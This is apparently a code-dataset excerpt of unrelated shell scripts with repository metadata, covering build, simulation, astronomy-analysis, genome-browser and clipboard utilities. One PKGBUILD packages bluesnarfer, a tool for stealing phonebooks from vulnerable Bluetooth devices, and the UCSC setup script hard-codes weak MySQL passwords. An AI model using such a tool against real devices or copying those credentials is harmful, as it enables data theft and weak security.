# $WORKSPACE/jenkins/build_matrix_entry_varan.sh BUILD_TYPE <VER> <WONTON_VER>
#
# BUILD_TYPE - pr, nightly, install
#
# if VER is abset, the HEAD of the master branch will be taken. If
# WONTON_VER is absent, the HEAD of the master branch of wonton will
# be taken. If BUILD_TYPE is 'install' and VER is specified, it will
# install it to /install_prefix/tangram/$VER-blah-blah; if VER is not
# specified, it will install to /install_prefix/wonton/dev-blah-blah
#
# Note that the following environment variables must be set (Jenkins
# will do this automatically).
#
# WORKSPACE - where the code is checked out
# CONFIG_TYPE - base, debug, serial, readme, thrust, kokkos
# COMPILER - intel, gcc6, gcc7
# BRANCH_NAME - master, kokkos
#
# The exit code determines if the test succeeded or failed.
# Exit on error
set -e
# Echo each command
set -x
# set umask so installations will have group rwx permission
umask 007
BUILD_TYPE=$1
version=$2
if [[ $version == "" ]]; then
version=dev
fi
tangram_version=$3
if [[ $tangram_version == "" ]]; then
tangram_version=dev
fi
wonton_version=$3
if [[ $wonton_version == "" ]]; then
wonton_version=dev
fi
echo "inside build_matrix on PLATFORM=$PLATFORM with BUILD_TYPE=$BUILD_TYPE $CONFIG_TYPE=$CONFIG_TYPE COMPILER=$COMPILER"
# special case for README builds
if [[ $BUILD_TYPE != "install" && $CONFIG_TYPE == "readme" ]]; then
# Put a couple of settings in place to generate test output even if
# the README doesn't ask for it.
export CTEST_OUTPUT_ON_FAILURE=1
CACHE_OPTIONS="-D ENABLE_JENKINS_OUTPUT=True"
sed "s/^ *cmake/& $CACHE_OPTIONS/g" $WORKSPACE/README.md >$WORKSPACE/README.md.1
python2 $WORKSPACE/jenkins/parseREADME.py \
$WORKSPACE/README.md.1 \
$WORKSPACE \
varan
exit
fi
# set modules and install paths
export NGC=/usr/local/codes/ngc
ngc_include_dir=$NGC/private/include
# compiler-specific settings
if [[ $COMPILER =~ "intel" ]]; then
compiler_version=18.0.1
cxxmodule=intel/${compiler_version}
compiler_suffix="-intel-${compiler_version}"
openmpi_version=2.1.2
mpi_module=openmpi/${openmpi_version}
mpi_suffix="-openmpi-${openmpi_version}"
elif [[ $COMPILER =~ "gcc" ]]; then
openmpi_version=2.1.2
if [[ $COMPILER == "gcc6" ]]; then
compiler_version=6.4.0
elif [[ $COMPILER == "gcc7" ]]; then
compiler_version=7.3.0
elif [[ $COMPILER == "gcc8" ]]; then
compiler_version=8.2.0
openmpi_version=3.1.3
fi
cxxmodule=gcc/${compiler_version}
compiler_suffix="-gcc-${compiler_version}"
mpi_module=openmpi/${openmpi_version}
mpi_suffix="-openmpi-${openmpi_version}"
fi
# Jali
jali_flags="-D PORTAGE_ENABLE_Jali::BOOL=True"
# FleCSI
flecsi_flags="-D PORTAGE_ENABLE_FleCSI:BOOL=False" # Not building with FleCSI for HPC builds
# THRUST
thrust_flags=
thrust_suffix=
if [[ $CONFIG_TYPE == "thrust" ]]; then
thrust_flags="-D PORTAGE_ENABLE_THRUST=True"
thrust_suffix="-thrust"
fi
# MPI or not
mpi_flags="-D PORTAGE_ENABLE_MPI=True"
if [[ $CONFIG_TYPE == "serial" ]]; then
mpi_flags="-D PORTAGE_ENABLE_MPI=False"
mpi_suffix=
jali_flags=
flecsi_flags=
fi
# Debug or Optimized build
cmake_build_type=Release
debug_suffix=
if [[ $CONFIG_TYPE == "debug" ]]; then
cmake_build_type=Debug
debug_suffix="-debug"
fi
# WONTON
wonton_install_dir=$NGC/private/wonton/${wonton_version}${compiler_suffix}${mpi_suffix}${thrust_suffix}${kokkos_suffix}${debug_suffix}
wonton_flags="-D WONTON_ROOT:FILEPATH=$wonton_install_dir"
# TANGRAM
if [[ $CONFIG_TYPE != singlemat ]]; then
tangram_install_dir=$NGC/private/tangram/${tangram_version}${compiler_suffix}${mpi_suffix}${thrust_suffix}${kokkos_suffix}${debug_suffix}
tangram_flags="-D PORTAGE_ENABLE_TANGRAM=True -D TANGRAM_ROOT:FILEPATH=$tangram_install_dir"
fi
# Build up an install dir name
portage_install_dir=$NGC/private/portage/${version}${compiler_suffix}${mpi_suffix}${thrust_suffix}${kokkos_suffix}${debug_suffix}
if [[ $COMPILER == "gcc6" && $CONFIG_TYPE != "serial" ]]; then
flecsi_flags="-D PORTAGE_ENABLE_FleCSI:BOOL=True" # FleCSI found through Wonton
fi
export SHELL=/bin/sh
export MODULEPATH=""
. /opt/local/packages/Modules/default/init/sh
module load $cxxmodule
module load cmake/3.14.0 # 3.13 or higher is required
if [[ -n "$mpi_flags" ]] ; then
module load ${mpi_module}
fi
echo $WORKSPACE
cd $WORKSPACE
rm -rf build
mkdir build
cd build
cmake \
-D CMAKE_BUILD_TYPE=$cmake_build_type \
-D CMAKE_CXX_FLAGS="-Wall -Werror" \
-D ENABLE_UNIT_TESTS=True \
-D ENABLE_APP_TESTS=True \
-D ENABLE_JENKINS_OUTPUT=True \
$mpi_flags \
$wonton_flags \
$tangram_flags \
$thrust_flags \
$jali_flags \
$flecsi_flags \
$cov_flags \
..
make -j2
ctest --output-on-failure
if [[ $CONFIG_TYPE == "coverage" ]]; then
gcovr -r .. -x >coverage.xml
fi
if [[ $BUILD_TYPE == "install" ]]; then
make install
fi
| true
|
b94917ccc216aaea16883904973a32e3d4f18fcf
|
Shell
|
robvogelaar/tditracer
|
/minimal-tdi-tests/runsim003.sh
|
UTF-8
| 2,069
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/sh
kill -9 $(pidof simserver)
kill -9 $(pidof sleeper)
proc()
{
LD_PRELOAD=libtdi.so TRACEBUFFERSIZE=1 REMOVE=0 SELFINFO=100 ./simserver /tmp/s$1 &
sleep 1
local fcounter=1
while [ $fcounter -le `expr $4` ]
do
echo "mmap $2" | ./simclient /tmp/s$1
echo "code libcode$1.so f$fcounter 100 $3" | ./simclient /tmp/s$1
fcounter=`expr $fcounter + 1`
done
}
code()
{
echo "code libcode$1.so f$2 $3 $4" | ./simclient /tmp/s$1
}
memset()
{
echo "memset $2" | ./simclient /tmp/s$1
}
mark()
{
echo "mark" | ./simclient /tmp/s1
}
###############################################################################
LD_PRELOAD=libtdi.so DISKS=sda2,sdb1 TRACEBUFFERSIZE=2 SYSINFO=100 ./sleeper &
sleep 1
proc 1 8M 1024 4
proc 2 8M 1024 4
proc 3 8M 1024 4
mark
counter=1
while [ $counter -le `expr 10` ]
do
code 1 1 100 1024
code 1 2 100 1024
code 1 3 100 1024
code 1 4 100 1024
code 2 1 100 1024
code 2 2 100 1024
code 2 3 100 1024
code 2 4 100 1024
code 3 1 100 1024
code 3 2 100 1024
code 3 3 100 1024
code 3 4 100 1024
counter=`expr $counter + 1`
done
mark
proc 4 24M 2048 4
mark
counter=1
while [ $counter -le `expr 20` ]
do
code 1 1 100 1024
code 1 2 100 1024
code 1 3 100 1024
code 1 4 100 1024
code 2 1 100 1024
code 2 2 100 1024
code 2 3 100 1024
code 2 4 100 1024
code 3 1 100 1024
code 3 2 100 1024
code 3 3 100 1024
code 3 4 100 1024
code 4 1 100 1024
code 4 2 100 1024
code 4 3 100 1024
code 4 4 100 1024
counter=`expr $counter + 1`
done
mark
memset 1 1
memset 1 2
memset 1 3
memset 1 4
memset 2 1
memset 2 2
memset 2 3
memset 2 4
memset 3 1
memset 3 2
memset 3 3
memset 3 4
memset 4 1
memset 4 2
memset 4 3
memset 4 4
mark
counter=1
while [ $counter -le `expr 20` ]
do
code 1 1 100 1024
code 1 2 100 1024
code 1 3 100 1024
code 1 4 100 1024
code 2 1 100 1024
code 2 2 100 1024
code 2 3 100 1024
code 2 4 100 1024
code 3 1 100 1024
code 3 2 100 1024
code 3 3 100 1024
code 3 4 100 1024
code 4 1 100 1024
code 4 2 100 1024
code 4 3 100 1024
code 4 4 100 1024
counter=`expr $counter + 1`
done
mark
| true
|
780deecb89aee5e901691138a2b1d12eb13ad734
|
Shell
|
Notoriousjayy/Programming-Language-Pragmatics
|
/Bash/Control Flow/Chapter 13 scripts/test1.sh
|
UTF-8
| 163
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/bash
# basic for command
# Reading values in a list
for test in Alabama Alaska Arizona Arkansas California Colorado
do
echo "The next state is $test"
done
| true
|
46d41df11fbd9df98b702458aa8d77df80cbeb84
|
Shell
|
alexanderfield/vbox-machines
|
/vagrant-sandboxes/docker/run.sh
|
UTF-8
| 846
| 3.703125
| 4
|
[] |
no_license
|
#!/bin/bash
DOCKER_FILE=docker-engine-1.7.1-1.el7.centos.x86_64.rpm
DOCKER_FILE_TRUSTED_HASH=de3009d88a0b8a74a9d40a44e2e1101d
if [ ! -f $DOCKER_FILE ];
then
wget https://get.docker.com/rpm/1.7.1/centos-7/RPMS/x86_64/$DOCKER_FILE
HASH_TO_TEST="$(md5 -r $DOCKER_FILE | awk '{ print $1}')"
if [ $HASH_TO_TEST != $DOCKER_FILE_TRUSTED_HASH ]
then
echo "Downloaded docker rpm doesn't hash!!"
rm $DOCKER_FILE
echo "Downloaded file deleted. Exiting!"
exit
fi
fi
vagrant up --provision
vagrant status
# Test docker is up...
# Docker should be daemonized and remotely available...
# From scratch, will need image(s) before any container(s) can be run...
# Get images by running docker pull <imagename> (ie docker pull centos)...
# Create a container and run a program in it with docker run (ie sudo docker run -it )
| true
|
be5f2fb34cc270682405668f7ba7110e2d617d88
|
Shell
|
opsnull/system-config
|
/lib/misc/wait-for-desktop-env
|
UTF-8
| 255
| 3
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#!/usr/bin/env bash
wait_win=xfce4-panel
if test "$(get-about-me desktop-env)" = kde; then
wait_win=Plasma
fi
while test "$(sawfish-client -e '(window-exists-p "'${wait_win}'")')" != t; do
log "waiting for ${wait_win} to start"
sleep 1
done
| true
|
e0df59b5d5c222da410db1988a4aa65c4888d651
|
Shell
|
OpenStackweb/openstack-org
|
/scripts/bootstrap.sh
|
UTF-8
| 1,880
| 3.046875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Copyright (c) 2019 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
GITHUB_OAUTH_TOKEN=$1
echo "GITHUB_OAUTH_TOKEN is $GITHUB_OAUTH_TOKEN";
sudo apt-get update;
sudo apt-get --yes upgrade;
sudo apt-get --no-install-recommends --yes install puppet composer;
if [[ -n "$GITHUB_OAUTH_TOKEN" ]]; then
echo "running composer config -g github-oauth.github.com $GITHUB_OAUTH_TOKEN";
sudo -H -u vagrant bash -c "composer config -g github-oauth.github.com $GITHUB_OAUTH_TOKEN";
fi
puppet --version;
mkdir -p /etc/puppet/modules;
puppet module install --force --module_repository https://forge.puppet.com --version 5.2.0 puppetlabs-stdlib;
puppet module install --force --module_repository https://forge.puppet.com --version 8.0.0 puppetlabs-mysql;
puppet module install --force --module_repository https://forge.puppet.com --version 0.16.0 puppet-nginx;
puppet module install --force --module_repository https://forge.puppet.com --version 4.0.0 petems-swap_file;
puppet module install --force --module_repository https://forge.puppet.com --version 6.3.0 puppetlabs-apt;
puppet module install --force --module_repository https://forge.puppet.com --version 7.0.0 puppet-nodejs;
# Set up environment variables, adding the new tools to PATH.
sudo sh -c "cat > /etc/profile.d/composer.sh" <<'EOF'
export COMPOSER_HOME=/var/www/www.openstack.org
EOF
| true
|
690d7c6ff41469e845572aface999893bac6641b
|
Shell
|
hellnest/archpwn
|
/repo/bluetooth/bluesnarfer/PKGBUILD
|
UTF-8
| 622
| 2.671875
| 3
|
[] |
no_license
|
# Contributor: Francesco Piccinno <stack.box@gmail.com>
pkgname=bluesnarfer
pkgver=0.1
pkgrel=2
pkgdesc="Bluesnarfer will download the phonebook of any mobile device vulnerable to bluesnarfing."
url="http://www.alighieri.org/project.html"
groups=('archpwn' 'archpwn-bluetooth')
license=('GPL')
arch=(i686 x86_64)
makedepends=('gcc')
depends=(bluez)
source=(http://www.alighieri.org/tools/$pkgname.tar.gz)
md5sums=('ee1fcf2e12b74e8cf65f43cdd2c47b72')
build() {
cd "$srcdir/$pkgname"
make || return 1
install -Dm755 $pkgname $pkgdir/usr/bin/$pkgname
install -Dm644 README $pkgdir/usr/share/doc/$pkgname/README
}
# vim:set ts=2 sw=2 et:
| true
|
459ad4ea5e4f3ed52f258137217fdd8181528821
|
Shell
|
wangchengww/Peach
|
/ucscgb/run.sh
|
UTF-8
| 8,331
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
#########################################################################
# http://stackoverflow.com/questions/230266/vi-vim-how-to-pipe-visually-selected-text-to-a-unix-command-and-append-output-to
# http://stackoverflow.com/questions/3752785/what-can-you-execute-on-visually-selected-text-in-vim
#
# You select parts of vi buffer and execute them.
# 1. Select parts of any text using VI command `V'.
# 2. Push `:!bash' to execute them.
# 3. Push `u' to make the executed parts be reappear.
#########################################################################
# Export these shell variables for easy access. You need to run them in the BASH
# shell directly.
# Create a directory, ucsc, at $HOME/Documents/Projects
# git clone git://genome-source.cse.ucsc.edu/kent.git
# Follow the instructions available at kent/src/product
# Start a Apache Web server in Mac OSX (Mountain Lion)
# $ sudo apachectl start
# $ sudo defaults write /System/Library/LaunchDaemons/org.apache.httpd Disabled -bool false
# See
# http://reviews.cnet.com/8301-13727_7-57481978-263/how-to-enable-web-sharing-in-os-x-mountain-lion/
# for detail of setting up a Web Server in Mac OSX Mountain Lion
# Install MySQL
# $ sudo /usr/local/mysql/support-files/mysql.server start
# $ /usr/local/mysql/bin/mysqladmin -u root password 'yourpasswordhere'
export UCSCDIR=/Users/goshng/Documents/Projects/ucsc
export KENT=/Users/goshng/Documents/Projects/ucsc/kent
export KENTPRODUCT=/Users/goshng/Documents/Projects/ucsc/kent/src/product
export SQL_PASSWORD=$USER
#########################################################################
# Let's add a new genome to streptoccocus genus.
#
# SdeqATCC12394
# REFGENOMEFASTA=/Volumes/Elements/Documents/Projects/mauve/bacteria/cornell_sde1/CP002215.gbk
# SdeqGGS124
# REFGENOMEFASTA=/Volumes/Elements/Documents/Projects/mauve/bacteria/Streptococcus_dysgalactiae_equisimilis_GGS_124_uid59103/NC_012891.fna
# SddyATCC27957
# REFGENOMEFASTA=/Volumes/Elements/Documents/Projects/mauve/bacteria/cornell_sdd/sdd.gbk
# SpyMGAS315
# REFGENOMEFASTA=/Volumes/Elements/Documents/Projects/mauve/bacteria/Streptococcus_pyogenes_MGAS315_uid57911/NC_004070.fna
# SpyMGAS10750
# REFGENOMEFASTA=/Volumes/Elements/Documents/Projects/mauve/bacteria/Streptococcus_pyogenes_MGAS10750_uid58575/NC_008024.fna
# Seeq4047
# REFGENOMEFASTA=/Volumes/Elements/Documents/Projects/mauve/bacteria/Streptococcus_equi_4047_uid59259/NC_012471.fna
#
# 1. Copy the source file: genbank or FASTA format.
KENT=/Users/goshng/Documents/Projects/ucsc/kent
KENTPRODUCT=/Users/goshng/Documents/Projects/ucsc/kent/src/product
SQL_PASSWORD=$USER
###########################################################
# BEGIN of load bacterial genome function
###########################################################
function loadBacterialGenome {
echo -n "What is the database name for the genome? (e.g., SddyATCC27957) "
read DBNAME
REFGENOME=$DBNAME
echo -n "Will you use a genbank format for creating $DBNAME? (Type in y or n) "
read WISH
if [ "$WISH" == "y" ]; then
echo -n "What is the file name of a genbank format? (e.g., /path/to/$DBNAME.gbk) "
read REFGENOMEFASTA
echo " copying $REFGENOMEFASTA ..."
cp $REFGENOMEFASTA $DBNAME.gbk
echo " converting the gbk to the FASTA file using Kent's gbToFaRa command ..."
gbToFaRa /dev/null $REFGENOME.fna $REFGENOME.ra $REFGENOME.ta $REFGENOME.gbk
toUpper $REFGENOME.fna $REFGENOME.fna.upper
faSize $REFGENOME.fna.upper
rm $REFGENOME.fna $REFGENOME.ra $REFGENOME.ta
mv $REFGENOME.fna.upper $REFGENOME.fna
echo -n "Please, Edit `pwd`/$REFGENOME.fna so that the header is chr1, and enter:"
read DONE
fi
echo -n "Will you use a FASTA format file for creating $DBNAME? (Type in y or n) "
read WISH
if [ "$WISH" == "y" ]; then
echo -n "What is the file name in FASTA format? (e.g., /path/to/$DBNAME.fna) "
read REFGENOMEFASTA
cp $REFGENOMEFASTA $DBNAME.fna
echo -n "Please, Edit `pwd`/$DBNAME.fna so that the header is chr1, and enter:"
read DONE
fi
echo " creating a 2bit file of the FASTA file ..."
hgFakeAgp -minContigGap=1 $REFGENOME.fna $DBNAME.agp
faToTwoBit $REFGENOME.fna $DBNAME.2bit
mkdir -p /gbdb/$DBNAME/html
cp $DBNAME.2bit /gbdb/$DBNAME
# 5. Check agp and 2bit.
# sort -k1,1 -k2n,2n $DBNAME.agp > $DBNAME.agp.2
# checkAgpAndFa $DBNAME.agp.2 $DBNAME.2bit
echo " creating a database ..."
twoBitInfo $DBNAME.2bit stdout | sort -k2nr > chrom.sizes
rm -rf bed
mkdir -p bed/chromInfo
awk '{printf "%s\t%d\t/gbdb/DBNAME/DBNAME.2bit\n", $1, $2}' \
chrom.sizes > bed/chromInfo/chromInfo.tab.tmp
sed s/DBNAME/$DBNAME/g < bed/chromInfo/chromInfo.tab.tmp > bed/chromInfo/chromInfo.tab
hgsql -e "create database $DBNAME;" mysql
echo " creating grp, chromInfo tables ..."
hgsql $DBNAME < $KENT/src/hg/lib/grp.sql
cp bed/chromInfo/chromInfo.tab /tmp/
hgLoadSqlTab $DBNAME chromInfo $KENT/src/hg/lib/chromInfo.sql \
/tmp/chromInfo.tab
rm /tmp/chromInfo.tab
hgGoldGapGl $DBNAME $DBNAME.agp
echo " creating GC5 track ..."
mkdir bed/gc5Base
hgGcPercent -wigOut -doGaps -file=stdout -win=5 -verbose=0 $DBNAME \
$DBNAME.2bit | wigEncode stdin bed/gc5Base/gc5Base.{wig,wib}
hgLoadWiggle -pathPrefix=/gbdb/$DBNAME/wib \
$DBNAME gc5Base bed/gc5Base/gc5Base.wig
mkdir -p /gbdb/$DBNAME/wib/bed/gc5Base
cp bed/gc5Base/gc5Base.wib /gbdb/$DBNAME/wib/bed/gc5Base
echo -n "Please, edit files/dbDbInsert.sql for DB name, genome name, date, and scientific name and enter:"
read DONE
hgsql hgcentral < files/dbDbInsert.sql
echo " granting permission on the created database ..."
mysql -u root -p${SQL_PASSWORD} -e "GRANT FILE ON *.* to browser@localhost \
IDENTIFIED BY 'genome';" mysql
# 1. SdeqATCC12394
# 2. SdeqGGS124
# 3. SddyATCC27957
# 4. SpyMGAS315
# 5. SpyMGAS10750
DBNAME=SpyMGAS10750
SQL_PASSWORD=$USER
mysql -u root -pgoshng --database=$DBNAME < dbdump/spy2knonwgenes.txt
for DB in $DBNAME # hgcentral hg19 hg18 strMut1 hgFixed # proteins040315
do
mysql -u root -p${SQL_PASSWORD} -e "GRANT SELECT, INSERT, UPDATE, DELETE, \
CREATE, DROP, ALTER, CREATE TEMPORARY TABLES on ${DB}.* \
TO browser@localhost \
IDENTIFIED BY 'genome';" mysql
done
for DB in $DBNAME # hgcentral hg19 hg18 strMut1 hgFixed # cb1 proteins040315
do
mysql -u root -p${SQL_PASSWORD} -e "GRANT SELECT, CREATE TEMPORARY TABLES \
on ${DB}.* TO \
readonly@localhost IDENTIFIED BY 'access';" mysql
done
for DB in hgcentral
do
mysql -u root -p${SQL_PASSWORD} -e "GRANT SELECT, INSERT, UPDATE, DELETE, \
CREATE, DROP, ALTER on ${DB}.* TO readwrite@localhost \
IDENTIFIED BY 'update';" mysql
done
echo "Please, edit the local tracks and make it"
rm -f $DBNAME.fna $DBNAME.2bit $DBNAME.agp $DBNAME.gbk chrom.size
rm -rf bed
}
###########################################################
# END of load bacterial genome function
###########################################################
###########################################################
# Load wiggle files of recombination intensity.
# TODO: the other 4 species should be added. The generation of the map for the
# wiggle file takes time.
function loadRI {
WIGDIR=/Users/goshng/Documents/Projects/Mauve/output/cornellf/3/run-analysis
WIGFILEBASE=ri1-refgenome4-map
DBNAME=SpyMGAS315
wigEncode $WIGDIR/$WIGFILEBASE.wig $WIGDIR/$WIGFILEBASE.temp.wig $WIGDIR/$WIGFILEBASE.wib
hgLoadWiggle $DBNAME ri $WIGDIR/$WIGFILEBASE.temp.wig
rm $WIGDIR/$WIGFILEBASE.temp.wig
mv $WIGDIR/$WIGFILEBASE.wib /gbdb/$DBNAME/wib/
hgsql $DBNAME -e "update ri set file='/gbdb/$DBNAME/wib/$WIGFILEBASE.wib'"
}
###########################################################
# Load sequence alignments in wigMaf format.
# Use /Users/goshng/Documents/Projects/Mauve/test/wigmaf/run
# And make makeDb/trackDb file.
# All of the mauve alignments were loaded.
###########################################################
# Load recombination probability in BED format.
# Let me make something in /Users/goshng/Documents/Projects/Mauve/test/wigmaf/run
###########################################################
# Load virulence genes in BED format.
# Check /Users/goshng/Documents/Projects/Mauve/test/virulence/run
###########################################################
# Load recombination rate per block in BED format.
#
###########################################################
# Load recombination probability.
#
| true
|
21c991280709054117917c1f9bbae70c8e51f4da
|
Shell
|
veraabad/dotfiles
|
/scripts/bootstrap-rpi.sh
|
UTF-8
| 762
| 3.375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# @Author: Abad Vera
# @Date: 06/06/2020
# @Last Modified by: Abad Vera
# @Last Modified time: 09/25/2020
# Installer for raspberry pi
# Go to dotfiles directory
cd "$(dirname $0)/.."
DOTFILES_DIR=$(pwd -P)
SCRIPT_DIR="scripts"
set -e
source ./$SCRIPT_DIR/print_source.sh
source ./$SCRIPT_DIR/common.sh
sudo apt-get update
# Install list of programs
< ./$SCRIPT_DIR/apt-get-list.txt xargs sudo apt-get install -y
# Update locale
# sudo sed -i 's/en_GB.UTF-8 UTF-8/# en_GB.UTF-8 UTF-8/g' /etc/locale.gen
sudo sed -i 's/# en_US.UTF-8/en_US.UTF-8/g' /etc/locale.gen
sudo locale-gen en_US.UTF-8
sudo update-locale en_US.UTF-8
install_tmux_plugins
install_exa
# Link dotfiles
install_dotfiles -r
# Set zsh as the default
check_default_shell
| true
|
eb54b18704e738602012db70b9a81f134b246e46
|
Shell
|
najamk/assignment1_task1
|
/funny.sh
|
UTF-8
| 553
| 4.125
| 4
|
[] |
no_license
|
#!/bin/bash
# The script will return "This is funny." if any argument is given.
# Executing script without an argument will result in "This is NOT funny."
# The argument in the first paramter position is stored as a variable "var".
var=$1
# Then the variable is tested with the paramter -z which returns true if empty.
# If no argument is given, we want it to say "NOT funny"
# and if it is not empty, i.e. a argument is given, it will return "funny".
if test -z "$var"
then
echo "This is NOT funny."
else
echo "This is funny."
fi
| true
|
c4afd561e7cc99e1be8bd17391ba09c54a6db2be
|
Shell
|
loganlinn/dotfiles
|
/bin/termcopy
|
UTF-8
| 2,221
| 4.0625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/zsh
# Usage: termcopy [FILE...]
#
# Copies the contents of the given files (or stdin if no files are given) to
# the terminal that runs this program. If this program is run inside tmux(1),
# then it also copies the given contents into tmux's current clipboard buffer.
# If this program is run inside X11, then it also copies to the X11 clipboard.
#
# This is achieved by writing an OSC 52 escape sequence to the said terminal.
# The maximum length of an OSC 52 escape sequence is 100_000 bytes, of which
# 7 bytes are occupied by a "\033]52;c;" header, 1 byte by a "\a" footer, and
# 99_992 bytes by the base64-encoded result of 74_994 bytes of copyable text.
#
# In other words, this program can only copy up to 74_994 bytes of its input.
# However, in such cases, this program tries to bypass the input length limit
# by copying directly to the X11 clipboard if a $DISPLAY server is available;
# otherwise, it emits a warning (on stderr) about the number of bytes dropped.
#
# See http://en.wikipedia.org/wiki/Base64 for the 4*ceil(n/3) length formula.
# See http://sourceforge.net/p/tmux/mailman/message/32221257 for copy limits.
# See http://sourceforge.net/p/tmux/tmux-code/ci/a0295b4c2f6 for DCS in tmux.
#
# Written in 2014 by Suraj N. Kurapati <https://github.com/sunaku>
# Also documented at https://sunaku.github.io/tmux-yank-osc52.html
#
# Modified by jason0x43 <https://github.com/jason0x43>
# Modified by loganlinn <https://github.com/loganlinn>
put() {
esc=$1
if [[ -n "$TMUX" ]]; then
esc="\033Ptmux;\033$esc\033\\"
fi
printf $esc
}
# kitty always appends to the clipboard, so clear it first
#https://sw.kovidgoyal.net/kitty/protocol-extensions.html#pasting-to-clipboard
put "\033]52;c;!\a"
# copy via OSC 52
buf=$(cat "$@")
len=$(printf %s "$buf" | wc -c)
max=74994
if (( len > max )); then
echo "$0: input is $(( len - max )) bytes too long" >&2
fi
put "\033]52;c;$(printf %s "$buf" | head -c $max | base64 | tr -d '\r\n')\a"
# also copy to tmux
if [[ -n "$TMUX" ]]; then
tmux set-buffer "$buf" ||:
fi
# also copy to the clipboard
if (( $+commands[pbcopy] )); then
printf %s "$buf" | pbcopy
elif (( $+commands[xclip] )); then
printf %s "$buf" | xclip -in -selection clipboard
fi
| true
|
4d66cb4f667c69c91ba9323553dad711fd393b39
|
Shell
|
atwoz/vimeko
|
/sources_non_forked/vim-diff-enhanced/test/test.sh
|
UTF-8
| 545
| 3.296875
| 3
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer",
"Vim"
] |
permissive
|
#!/bin/sh
# set -ex
for i in */; do
cd "$i"
algorithm=$(cat ./diff.txt)
( LC_ALL=C vim -N --cmd ":let g:enhanced_diff_debug=1" -c ':set acd' \
-c ":EnhancedDiff $algorithm" -c ':botright vsp +next' -c ':windo :diffthis' -c ':qa!' file* \
> /dev/null ) 2>&1 | sed '/Vim: Warning: Output is not to a terminal/d'
diff=`diff normal_diff.ok EnhancedDiff_normal.txt`
if [ $? -ne 0 ]; then
printf "Failure with test %s\n" "${i%%/}"
printf "$diff\n"
break
else
printf "Test %s: OK\n" "${i%%/}"
fi
cd ..
done
| true
|
d7f2a5c3cd46bbd33df81cfd2efe3e29182a55bf
|
Shell
|
ferrigno/osa-hpc-scripts
|
/JEMX1_onescw.sh
|
UTF-8
| 2,847
| 2.796875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#
# PARAMETER
#
# par1: scwid without extension e.g. "00520010010"
# par2: tbin for the lc extraction in sec
# note that the script assumes the scw are found in the archive
# and at peculiar location for the input catalogue
#
### GRID SETUP
#
#$ -S /bin/bash
#$ -j y
#$ -o /gpfs0/ferrigno/INTEGRAL/nrt_analysis/logs
#$ -cwd
if [ $# -ne 1 ]; then
echo "you must give exactly one parameter"
exit 1
else
export OGID=${1}
# export do_og_create=${2}
fi
#
### ANALYSIS SETUP
#
export REP_BASE_PROD=/isdc/arc/rev_3
#export ISDC_REF_CAT=/unsaved_data/ferrigno/INTEGRAL/nrt_refr_cat.fits
#export ISDC_OMC_CAT=/isdc/arc/rev_3/cat/omc/omc_refr_cat.fits
#export ISDC_ENV=/gpfs0/ferrigno/INTEGRAL/osa11
#source $ISDC_ENV/bin/isdc_init_env.sh
#echo $ISDC_ENV
export COMMONLOG=comlog.txt
echo "Analysis is done on"
hostname
echo $PWD
export COMMONSCRIPT=1
export REVNO=`echo $OGID | cut -b1-4`
export COMMONLOGFILE=+log.$OGID
unset DISPLAY
rm -rf obs/${OGID}J1
mkdir -p obs/${OGID}J1/pfiles
export PFILES="${PWD}/obs/${OGID}J1/pfiles;${ISDC_ENV}/pfiles:$HEADAS/syspfiles"
echo $PFILES
echo $HOSTNAME
### OG CREATION
#
echo "$OGID" > /tmp/$$.So.lis
cat /tmp/$$.So.lis
og_create \
idxSwg=/tmp/$$.So.lis \
ogid=${OGID}J1 baseDir=./ instrument=JMX1 obs_id=""
rm /tmp/$$.So.lis
### ANALYSIS
#METHOD 1
cd obs/${OGID}J1
#cp ../../isgri_srcl_res_oao1654.fits user_cat.fits
#cp ../../isgri_srcl_res_3A1822.fits user_cat.fits
#cp ../../isgri_srcl_res_v0332_clean.fits user_cat.fits
#cp ../../isgri_srcl_res_V404.fits user_cat.fits
#cp ../../isgri_srcl_res_velax1.fits user_cat.fits
#cp ../../gc2193_isgri_srcl_res_clean.fits user_cat.fits
cp ../../archived_cat_lists/maxi_isgri_srcl_res.fits user_cat.fits
export master_file=ic_master_file.fits
#j_rebin_rmf ic_master=${REP_BASE_PROD}/idx/ic/${master_file} jemx_num=1 binlist=STD_008 outfile=jmx1_rebinned_rmf.fits
export curr_dir=$PWD
#skipLevels="LCR"
jemx_science_analysis ogDOL="${curr_dir}/og_jmx1.fits[1]" jemxNum=1 startLevel="COR" endLevel="LCR" \
skipLevels="SPE" chatter=2 clobber=yes osimData=no ignoreScwErrors=no skipSPEfirstScw = 'y' \
timeStart=-1 timeStop=-1 nPhaseBins=0 phaseBins="" radiusLimit=122 IC_Group="${REP_BASE_PROD}/idx/ic/${master_file}[1]" \
nChanBins=1 chanLow="46" chanHigh="178" \
IC_Alias="OSA" instMod="" response="jmx1_rebinned_rmf.fits" arf="" \
LCR_useIROS=yes LCR_timeStep=3000 LCR_doBurstSearch=yes \
IMA_burstImagesOut=yes \
CAT_I_usrCat=user_cat.fits
#nChanBins="2" chanLow="46 129" chanHigh="128 178" \
#nChanBins=-1 chanHigh="" chanLow="" \
#CAT_I_usrCat=user_cat.fits
#CAT_I_usrCat="$ISDC_REF_CAT" \
#CAT_I_usrCat="$REP_BASE_PROD/gnrl_refr_cat_0041_20180811.fits"
# chanLow="46 130" chanHigh="129 174" \
echo "JEM-X science window analysis finished up to spectral level. Results can be found under:"
echo $PWD
| true
|
b73a09532a5fc625747159059bff8b88becbe1f7
|
Shell
|
nadeemahmad/dotfiles
|
/files/.bash_profile
|
UTF-8
| 400
| 3.546875
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
export BASE_DIR="${HOME}/.base"
if [ ! -d "${BASE_DIR}" ]; then
